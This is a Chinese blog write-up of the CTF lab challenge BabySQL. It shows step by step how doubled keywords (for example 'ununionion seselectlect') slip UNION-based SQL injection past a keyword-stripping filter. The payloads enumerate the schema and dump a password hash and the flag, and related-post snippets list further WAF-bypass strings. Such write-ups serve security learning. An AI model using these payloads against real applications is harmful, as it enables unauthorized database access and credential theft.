双写绕过 [极客大挑战 2019]BabySQL 1

已于 2023-11-15 19:16:32 修改
阅读量455 收藏
点赞数 1
文章标签: sql 数据库
于 2023-11-14 21:56:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/134406238
版权

打开题目

随便输入账号密码

根据报错信息可知这是单引号的字符型注入

那我们试试万能密码

1' or '1'='1  页面报错

1  or '1'='1 页面报错

而且根据报错内容显示是没有我们注入上去的or的

那我们就试试

1' order by 3 #

页面报错,根据报错显示页面过滤掉了or和by

那我们试试

-1' union select 1,2,3,4 #

根据报错显示页面过滤了union和select

那我们就可以尝试双写绕过

1' ununionion seselectlect 1 #

报错显示有不同的列名

那就一个一个试吧

1' ununionion seselectlect 1,2,3#

页面正常

并且这里显示报错显示位为2,3

1' ununionion seselectlect 1,2,3,4#

页面报错

说明列名字段数为3

爆用户名和数据库名

-1’ ununionion seselectlect 1,user(),database()  #

这样我们就可以知道数据库用户名为root@localhost,数据库名为geek

-1' ununionion seselectlect 1,version(),@@version_compile_os #

这样我们就知道操作系统version_compile_os为Linux,数据库版本为10.3.18-MariaDB

总结一下就是

操作系统version_compile_os:Linux

数据库版本version():  10.3.18-MariaDB

数据库用户名user():  root@localhost

数据库名database():  geek

接下来我们查询geek数据库下的表名信息

-1' ununionion seselectlect 1,table_name,3 from information_schema.tables where table_shcema='geek' #

我们发现informmation,where都被过滤掉了

那我们对其进行双写

-1' uunionnion seselectlect 1,group_concat(table_name),3 frfromom inforformationmation_schema.tables whwhereere table_schema='geek' #

忘记页面是过滤or了

重新换个姿势

-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

说明表名有b4bsql,geekuser

爆破列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='geekuser' #

爆破数据

-1' uunionnion seselectlect 1,2,password frfromom geekuser  #

又忘记过滤or了

-1' uunionnion seselectlect 1,2,group_concat(passwoorrd) frfromom geekuser  #

这下爆出了password为2ac772d9987993a29b85958839d4e468

用户名为admin

id为1

尝试登录了一下用户名和密码,发现下面没有flag

那我们爆破b4bsql表下的列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

发现下面也有三个列名

-1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql #

查看页面源代码得到flag

知识点:

常见的sql注入绕过方式:SQL注入绕过入门总结篇 - FreeBuf网络安全行业门户

information_schema.schemata 获取所有数据库信息

表包含以下列:

  1. catalog_name:目录名称
  2. schema_name: 模式(数据库)的名称。
  3. default_character_set_name: 数据库编码。
  4. default_collation_name: 数据库排序规则

访白鹿
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2-4 【实验】11-双写绕过+代码审计
山兔的博客
03-23 1381
今天我们讲的是pass-10,我们用到的思路和我们之前讲sql注入,用到的思路是一样的,我们回想一下之前我们用到的思路 过滤union select,后台做了个单词的替换,将我们的union替换为空,或者替换为其它的一些特殊的字符,这个时候,我们在后台语句的执行中,因为union置换为空,所以产生了语法错误 当时我们有个思路,我们在union中间在加个union uniunionon select 当我们中间这个union被过滤之后,变为空之后,我们这个union就会和前面三个字符,后面两个字符,合并,组
SQL注入实战:绕过操作
ting_liang的博客
01-27 1504
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过
mooyuan的博客
11-29 1301
打开靶场第09关,http://192.168.71.151/sqli/09.php?id=1如下所示​SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第9关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第09关卡过滤了不区分大小写select关键字。
ctf /**/与双写 绕过sql过滤
qq_43943098的博客
07-11 3643
注意: 本博客可能转载了多处文章内容,所有转载内容均会标明出处,谢谢!! 0.在文章开始之前的话 本人也这是刚刚接触数据库这一块不过一周的时间,在此之前都是普通的码奴,所以对sql的命令或者语句有着错误的理解,请各位dalao海涵并在评论里指出。 1.浅谈我对sqlsql注入的理解 所谓sql,其原名是结构话查询语句,对于这个结构化我首先想到的是Linux里大部分的命令都带有的 -型的参数,再则...
sql注入绕过union select过滤
ncafei的博客
03-12 9718
#WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SEL
[极客挑战 2019]BabySQL1
m0_73721944的博客
11-11 168
检查与您的MariaDB服务器版本对应的手册,以便在第1行'1=1#'和password='123 "附近使用正确的语法。1'ununionion seselectlect 1,2,3#&passward=1 有回显,说明有三列。1’ order by 3#&passward=123 报错发现order中的or与by都被过滤了。1'ununionion seselectlect 1,2,3,4#&passward=1 报错。打开是这样的,是之前两个题的升级版。有回显说明双写绕过是可行的。
极客挑战2019babysql
kindyyy的博客
04-08 1231
我也是参考了大佬的wp才会做的题目..... 大佬博客:[极客挑战 2019]BabySQL - 云千 - 博客园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
极客学院 idea教程 含2017.1版本 PDF及两个视频
11-16
极客学院 idea教程 含最新的2017.1版本 PDF及两个视频
21.GeekPwn 2019极客大赛之安全攻防技术总结及ShowTime1
08-03
背景介绍你会带帐篷住酒店吗?这可能是个蠢问题,但绝不是一件蠢事。难保你不会出现在酒店、民宿、试衣间、网约车、公共厕所等场合。你不想被别人看到的隐私很有可能已经被
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
bugku中的多次(异或注入,updatexml报错注入,union过滤和locate绕过,布尔盲注)writeup
xuchen16的博客
09-27 1878
转载自:https://blog.csdn.net/mylyylmy/article/details/80030256 首先我们判断一下是什么注入类型 注意输入的是英文字符',中文不会转变为%27,报错,说明是字符注入 这时候我们就要判断一下SQL网站过滤了什么内容,我们可以使用异或注入来判断哪些字符串被过滤掉了 http://120.24.86.145:9004/1ndex.php?...
SQL: 将一个表中查出来数据插入到另一个表中
我的博客
06-11 1386
SQL: 将一个表中查出来数据插入到另一个表中 insert into A(a,b,c) (select a,b,c from B) 2、假如A表不存在 select a,b,c into A from B 3、假如需要跨数据库 insert into ADB.[dbo].A(a,b,c) (select a,b,c from BDB.[dbo].B)
Mybatis 动态 SQL 语句
Zachyy的博客
06-10 772
MyBatis 是一个优秀的持久层框架,它支持定制化 SQL、存储过程以及高级映射。在 MyBatis 中,动态 SQL 是一个非常重要的特性,它允许我们。动态SQL技术是一种的功能,它存在的意义是为了解决拼接SQL语句字符串时的痛点问题。
mysql-线上常用运维sql-2
jll126的博客
06-11 447
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
MySQL的高可用方案:深入Galera Cluster和ProxySQL
最新发布
哎 你看的博客
06-15 1045
一、引言 背景和重要性 面临的挑战和问题 高可用性介绍 二、Galera Cluster Galera Cluster简介 定义和用途 工作原理 特点和优势 部署Galera Cluster 准备工作 安装和配置 集群初始化及节点添加 Galera Cluster的运维 监控和维护 故障恢复和备份 优化和性能调整 三、ProxySQL ProxySQL简介 定义和用途 工作原理 特点和优势 部署ProxySQL 准备工作 安装和配置 连接管理和路由 ProxySQL运维 监控和维护 故障恢复和备份
PostgreSQL 快速入门与实战
代码洁癖症患者
06-11 967
# 创建模式## 删除模式## 删除模式并且删除该模式下的数据对象。
SQL Auto Increment
xyq2024的博客
06-13 404
在关系型数据库中,自动增量(Auto Increment)是一个常见且实用的特性。它允许数据库自动为表中插入的新行分配唯一的标识符,通常用于主键字段。本文将深入探讨SQL中的自动增量功能,包括其工作原理、在不同数据库系统中的实现,以及如何在实际应用中使用它。
[极客挑战 2019]BabySQL 1
09-03
BabySQL 1 是一道出现在极客挑战 2019 的题目,是一个 SQL 注入的题目。在这道题中,你需要通过注入来绕过对输入参数的限制,从而获取到所需的数据。 请注意,这里只是简单介绍了题目的基本情况,具体的题目内容...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值